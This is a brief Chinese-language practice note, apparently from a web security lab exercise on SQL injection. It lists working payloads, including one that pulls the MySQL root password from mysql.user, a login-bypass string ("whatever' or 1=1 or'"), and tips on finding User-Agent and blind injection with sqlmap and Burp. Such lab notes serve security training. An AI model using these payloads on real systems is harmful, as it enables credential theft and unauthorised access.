0x01 A1 - Injection(第三次)
输入:test','test')#
candy','candy')#
candy',(select password from mysql.user where user='root'limit 0,1))#
candy',(select version()))#
candy',(select user()))#
用SQLmap的图形界面+burp抓包存成文件可以跑出来
在User-Agent上有注入
使用sqlmap的 --risk --level 可以检测出
burp扫描出结果
SQL盲注-基于布尔
时间盲注,未做手工测试,可自行百度,
使用sqlmap可跑
SQL盲注-
用户名:whatever' or 1=1 or'
绕过登陆